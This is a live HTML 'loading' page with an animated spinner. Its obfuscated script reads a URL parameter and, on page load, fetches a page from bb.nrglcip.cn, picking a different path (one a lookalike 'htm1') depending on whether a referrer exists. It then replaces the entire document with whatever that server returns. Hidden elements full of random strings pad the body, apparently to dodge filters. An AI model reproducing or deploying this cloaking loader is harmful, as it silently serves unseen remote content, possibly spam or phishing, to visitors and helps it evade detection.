<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .etMuLHK {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .etMuLHK .cCAtk9 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .etMuLHK .content {
            line-height: 50px;
            text-align: center
        }

        .etMuLHK .img {
            width: 100%
        }

        .etMuLHK .cmhG4wE {
            text-align: center
        }

        .etMuLHK .cmhG4wE span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .etMuLHK .cmhG4wE span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .etMuLHK .cmhG4wE span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .etMuLHK .cmhG4wE span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .etMuLHK .cmhG4wE span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .etMuLHK .cmhG4wE span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .etMuLHK .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function z6bGsyKaRRRn(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var W0rcFte = z6bGsyKaRRRn('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ W0rcFte +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ W0rcFte +".html?a=share";
		}
		
        B9oZCxe6=url+"#"+new Date().getTime();
        B9oZCxe6 && function() {
            $.get(B9oZCxe6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>obkYSVlKlzv8ZYRxCs1wcBP9SGrrfhRARdqsZfhaK8tYO6KMIoniJiXgoxTEHer4hHcrr</a>
<b style='display:none' >yOJEp0vaShe5gRN6W8lnXny6Sm93a1EoGDi3nLpi0VBewjVGakW8t64d0Ty4Mrd4jJxPjgPsSh60fmZ</b>
<span style='display:none'>HGMWofV6qzxSCBdBDAXaQYXWUIyKVFst0RdE2CBP0ZtO8llqjWl</span>
<div style='display:none'>uZfBepH8D45LE1VQnz4AjrJ8ovif</div>
<img  src='' style='display:none'>
<h1 style='display:none' >rOVGUBAGy1qB9nkr0XEBoGabEMX9kSWbE1E8GLSwqkLov3NHNcRFK5XTdcyL</h1>
<b style='display:none' >yOJEp0vaShe5gRN6W8lnXny6Sm93a1EoGDi3nLpi0VBewjVGakW8t64d0Ty4Mrd4jJxPjgPsSh60fmZ</b>
<li style='display:none' >d4aAnymo9Sk4kLiJGnXaK32ap4kJk</li><div class="etMuLHK">
    <div class="cCAtk9">
        <div class="cmhG4wE">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >Uxn4hvIjChbdyUI5IiUJqZ3VIdaV3jzp5SoVEmmxQs6po5SOYzcFMUkBRGpO8kU</li>
<div style='display:none'>rd1azlTgTLTJpJPfsQMF3wsVRnxmzPquBUUCncQFpQVgsey0osVd8D0Wcbt4Qz6n41htQCpzS</div>
<div style='display:none'>rd1azlTgTLTJpJPfsQMF3wsVRnxmzPquBUUCncQFpQVgsey0osVd8D0Wcbt4Qz6n41htQCpzS</div>
<img  src='' style='display:none'>
<div style='display:none'>rd1azlTgTLTJpJPfsQMF3wsVRnxmzPquBUUCncQFpQVgsey0osVd8D0Wcbt4Qz6n41htQCpzS</div>
<h1 style='display:none' >cUPRqKHEgqICSs4zt5PRr4bvJpccSObE5H13KB8slpALJ5FY</h1>
<a  href='#' style='display:none'>lEtOnlKmCj07Aj2HimvrgXkV9</a>
<p  style='display:none'>XX3WWuLbDMMiQp9q</p>
<p  style='display:none'>XX3WWuLbDMMiQp9q</p></body>
</html>